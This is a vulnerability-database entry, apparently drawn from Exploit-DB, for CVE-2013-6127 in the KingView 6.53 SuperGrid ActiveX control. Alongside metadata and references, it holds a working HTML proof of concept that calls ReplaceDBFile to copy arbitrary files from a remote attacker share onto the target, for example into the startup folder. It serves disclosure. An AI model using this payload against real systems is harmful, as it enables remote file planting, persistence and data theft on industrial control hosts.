ID
VAR-E-201309-0194
CVE
cve_id: | CVE-2013-6127 | Trust: 1.9 |
cve_id: | CVE-2013-6128 | Trust: 0.3 |
EDB ID
28084
TITLE
KingView 6.53 - 'SuperGrid' Insecure ActiveX Control - Windows local Exploit
Trust: 0.6
DESCRIPTION
KingView 6.53 - 'SuperGrid' Insecure ActiveX Control. CVE-97015CVE-2013-6127 . local exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | kingview | model: | - | scope: | eq | version: | 6.53 | Trust: 1.6 |
vendor: | wellintech | model: | kingview | scope: | eq | version: | 6.53 | Trust: 0.3 |
EXPLOIT
<html>
<object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E' id='target'></object>
<!--
KingView Insecure ActiveX Control - SuperGrid
Vendor: http://www.wellintech.com
Version: KingView 6.53
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake
CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E
ProgId: SUPERGRIDLib.SuperGrid
Path: C:\Program Files\KingView\SuperGrid.ocx
MemberName: ReplaceDBFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented
-->
<title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title>
<p>This proof of concept will copy any arbritrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (ie from an attacker share to the startup folder). It can also be used to overwrite existing files.</p>
<input type=button onclick="copyfile()" value="Do It!">
<script>
function copyfile()
{
var file1 = "\\\\192.168.1.165\\share\\poc.txt"; //source
var file2 = "c:\\WINDOWS\\poc.txt"; //destination
result = target.ReplaceDBFile(file1,file2);
}
</script>
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'SuperGrid' Insecure ActiveX Control
Trust: 1.0
CREDITS
blake
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2013-6127 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 28084 | Trust: 1.6 |
db: | EDBNET | id: | 49926 | Trust: 0.6 |
db: | NVD | id: | CVE-2013-6128 | Trust: 0.3 |
db: | BID | id: | 62419 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2013-6127 | Trust: 1.6 |
url: | https://www.exploit-db.com/exploits/28084/ | Trust: 0.6 |
SOURCES
db: | BID | id: | 62419 |
db: | EXPLOIT-DB | id: | 28084 |
db: | EDBNET | id: | 49926 |
LAST UPDATE DATE
2022-07-27T09:21:57.421000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 62419 | date: | 2013-10-23T00:37:00 |
SOURCES RELEASE DATE
db: | BID | id: | 62419 | date: | 2013-09-04T00:00:00 |
db: | EXPLOIT-DB | id: | 28084 | date: | 2013-09-04T00:00:00 |
db: | EDBNET | id: | 49926 | date: | 2013-09-04T00:00:00 |